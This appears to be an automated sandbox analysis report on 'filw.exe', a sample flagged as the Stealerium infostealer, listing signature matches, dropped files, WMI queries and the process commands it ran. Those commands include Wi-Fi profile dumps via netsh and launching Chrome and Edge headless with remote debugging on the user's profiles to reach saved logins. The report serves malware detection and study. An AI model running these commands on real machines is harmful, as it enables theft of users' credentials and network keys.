Source: 00000000.00000000.1675375427.0000019D101D2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: Process Memory Space: filw.exe PID: 7432, type: MEMORYSTR	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen

Drops password protected ZIP file

Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@088753_en-CH.zip.0.dr	Zip Entry: encrypted

Source: C:\Users\user\Desktop\filw.exe	Code function: 0_2_00007FFD9B8C1B15	0_2_00007FFD9B8C1B15
Source: C:\Users\user\Desktop\filw.exe	Code function: 0_2_00007FFD9B8CEA79	0_2_00007FFD9B8CEA79
Source: C:\Users\user\Desktop\filw.exe	Code function: 0_2_00007FFD9B8D0905	0_2_00007FFD9B8D0905
Source: C:\Users\user\Desktop\filw.exe	Code function: 0_2_00007FFD9B8B8896	0_2_00007FFD9B8B8896
Source: C:\Users\user\Desktop\filw.exe	Code function: 0_2_00007FFD9B8C20B8	0_2_00007FFD9B8C20B8
Source: C:\Users\user\Desktop\filw.exe	Code function: 0_2_00007FFD9B8B9642	0_2_00007FFD9B8B9642
Source: C:\Users\user\Desktop\filw.exe	Code function: 0_2_00007FFD9B8EB5D0	0_2_00007FFD9B8EB5D0
Source: C:\Users\user\Desktop\filw.exe	Code function: 0_2_00007FFD9B8E0CE0	0_2_00007FFD9B8E0CE0
Source: C:\Users\user\Desktop\filw.exe	Code function: 0_2_00007FFD9B8CF4C0	0_2_00007FFD9B8CF4C0
Source: C:\Users\user\Desktop\filw.exe	Code function: 0_2_00007FFD9BAE4CFA	0_2_00007FFD9BAE4CFA
Source: C:\Users\user\Desktop\filw.exe	Code function: 0_2_00007FFD9BADDCC5	0_2_00007FFD9BADDCC5
Source: C:\Users\user\Desktop\filw.exe	Code function: 0_2_00007FFD9BAD5325	0_2_00007FFD9BAD5325
Source: C:\Users\user\Desktop\filw.exe	Code function: 0_2_00007FFD9BAD0CF2	0_2_00007FFD9BAD0CF2

Source: filw.exe

Static PE information: No import functions for PE file found

Source: filw.exe, 00000000.00000002.1999733605.0000019D22A2D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameICSharpCode.SharpZipLib.dllP vs filw.exe
Source: filw.exe, 00000000.00000002.2004857913.0000019D2B800000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Buffers.dllT vs filw.exe
Source: filw.exe, 00000000.00000002.2003618026.0000019D2B320000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Memory.dllT vs filw.exe
Source: filw.exe, 00000000.00000002.2003583949.0000019D2B310000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Bcl.AsyncInterfaces.dll@ vs filw.exe
Source: filw.exe, 00000000.00000002.1993398707.0000019D12AFA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Text.Json.dll@ vs filw.exe
Source: filw.exe, 00000000.00000002.1993398707.0000019D12AFA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Threading.Tasks.Extensions.dllT vs filw.exe
Source: filw.exe, 00000000.00000002.2001780739.0000019D2AEF4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs filw.exe
Source: filw.exe, 00000000.00000002.2005115328.0000019D2B830000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Text.Encodings.Web.dll@ vs filw.exe
Source: filw.exe, 00000000.00000002.2004906378.0000019D2B810000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Runtime.CompilerServices.Unsafe.dll@ vs filw.exe
Source: filw.exe, 00000000.00000002.2003165019.0000019D2B130000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs filw.exe
Source: filw.exe, 00000000.00000002.2005243574.0000019D2B860000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameICSharpCode.SharpZipLib.dllP vs filw.exe
Source: filw.exe, 00000000.00000002.2004445944.0000019D2B760000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Text.Json.dll@ vs filw.exe
Source: filw.exe, 00000000.00000000.1676391263.0000019D107E6000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamestub.exe6 vs filw.exe
Source: filw.exe, 00000000.00000002.1993398707.0000019D12B41000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Threading.Tasks.Extensions.dllT vs filw.exe
Source: filw.exe, 00000000.00000002.1999733605.0000019D229DD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameICSharpCode.SharpZipLib.dllP vs filw.exe
Source: filw.exe, 00000000.00000002.2003547527.0000019D2B300000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Threading.Tasks.Extensions.dllT vs filw.exe
Source: filw.exe, 00000000.00000002.2002880618.0000019D2B05A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCmd.Exe.MUIj% vs filw.exe
Source: filw.exe	Binary or memory string: Resources.OriginalFilename vs filw.exe
Source: filw.exe	Binary or memory string: FileDescription1Windows System Component!OriginalFilename vs filw.exe
Source: filw.exe	Binary or memory string: OriginalFilenamestub.exe6 vs filw.exe

Source: filw.exe, type: SAMPLE	Matched rule: infostealer_win_stealerium author = Sekoia.io, description = Detects Stealerium based on specific strings, creation_date = 2022-12-01, classification = TLP:CLEAR, version = 1.0, id = 165c7d3d-de7e-4d71-b94a-8ab4a0e5ddd5
Source: filw.exe, type: SAMPLE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 0.0.filw.exe.19d101d0000.0.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_stealerium author = Sekoia.io, description = Detects Stealerium based on specific strings, creation_date = 2022-12-01, classification = TLP:CLEAR, version = 1.0, id = 165c7d3d-de7e-4d71-b94a-8ab4a0e5ddd5
Source: 0.0.filw.exe.19d101d0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 00000000.00000002.1993398707.0000019D12504000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 00000000.00000000.1675375427.0000019D101D2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: Process Memory Space: filw.exe PID: 7432, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions

Source: filw.exe, ResourceManager.cs	Cryptographic APIs: 'CreateDecryptor'
Source: filw.exe, StringsCrypt.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.filw.exe.19d22a2dee8.4.raw.unpack, InflaterInputBuffer.cs	Cryptographic APIs: 'TransformBlock'
Source: 0.2.filw.exe.19d22a2dee8.4.raw.unpack, DeflaterOutputStream.cs	Cryptographic APIs: 'TransformBlock'
Source: 0.2.filw.exe.19d22a2dee8.4.raw.unpack, ZipAESTransform.cs	Cryptographic APIs: 'TransformBlock'

Source: classification engine

Classification label: mal100.rans.troj.spyw.evad.winEXE@87/472@32/28

Source: C:\Users\user\Desktop\filw.exe

File created: C:\Users\user\AppData\Roaming\svchost.exe

Jump to behavior

Source: C:\Users\user\Desktop\filw.exe	Mutant created: NULL
Source: C:\Users\user\Desktop\filw.exe	Mutant created: \Sessions\1\BaseNamedObjects\SCM4TS3DP9MBQTLHCONS
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5676:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8500:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7600:120:WilError_03

Source: C:\Users\user\Desktop\filw.exe

File created: C:\Users\user\AppData\Local\Temp\Stealerium-Latest.log

Jump to behavior

Source: C:\Users\user\Desktop\filw.exe

Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\5be28a57-b86d-4b0e-85c0-f6e6ec846e1e.bat"

Source: filw.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: filw.exe

Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%

Source: C:\Users\user\Desktop\filw.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\filw.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\filw.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\filw.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\filw.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\filw.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\filw.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\filw.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\filw.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\filw.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\filw.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\filw.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\filw.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\filw.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\filw.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\filw.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\filw.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\filw.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\filw.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\filw.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\filw.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\filw.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\filw.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\filw.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\filw.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( ProcessId = 7432)

Source: C:\Users\user\Desktop\filw.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\filw.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Login Data.16.dr, tmp94D4.tmp.dat.0.dr, tmp117D.tmp.dat.0.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: filw.exe	ReversingLabs: Detection: 71%
Source: filw.exe	Virustotal: Detection: 62%

Source: unknown	Process created: C:\Users\user\Desktop\filw.exe "C:\Users\user\Desktop\filw.exe"
Source: C:\Users\user\Desktop\filw.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\filw.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --headless=new --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --disable-gpu --disable-logging
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr All
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --disable-logging --mojo-platform-channel-handle=2028 --field-trial-handle=1980,i,4376263706655546236,12928841589883637916,262144 --disable-features=PaintHolding /prefetch:8
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Users\user\Desktop\filw.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Users\user\Desktop\filw.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9222 --headless=new --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --disable-gpu --disable-logging
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --disable-logging --mojo-platform-channel-handle=2132 --field-trial-handle=2040,i,9187529698848839277,3688106472142960608,262144 --disable-features=PaintHolding /prefetch:3
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9222 --headless=new --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --disable-gpu --disable-logging --noerrdialogs --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --disable-logging --mojo-platform-channel-handle=2180 --field-trial-handle=1984,i,10664872617930172595,16212941037007434464,262144 --disable-features=PaintHolding /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --noerrdialogs --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --disable-logging --mojo-platform-channel-handle=6384 --field-trial-handle=1984,i,10664872617930172595,16212941037007434464,262144 --disable-features=PaintHolding /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --noerrdialogs --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --disable-logging --mojo-platform-channel-handle=6736 --field-trial-handle=1984,i,10664872617930172595,16212941037007434464,262144 --disable-features=PaintHolding /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --disable-logging --mojo-platform-channel-handle=7280 --field-trial-handle=1984,i,10664872617930172595,16212941037007434464,262144 --disable-features=PaintHolding /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --disable-logging --mojo-platform-channel-handle=7280 --field-trial-handle=1984,i,10664872617930172595,16212941037007434464,262144 --disable-features=PaintHolding /prefetch:8
Source: C:\Users\user\Desktop\filw.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\5be28a57-b86d-4b0e-85c0-f6e6ec846e1e.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /PID 7432
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /T 2 /NOBREAK
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --noerrdialogs --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --disable-logging --mojo-platform-channel-handle=6928 --field-trial-handle=1984,i,10664872617930172595,16212941037007434464,262144 --disable-features=PaintHolding /prefetch:8
Source: C:\Users\user\Desktop\filw.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --headless=new --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --disable-gpu --disable-logging	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid	Jump to behavior
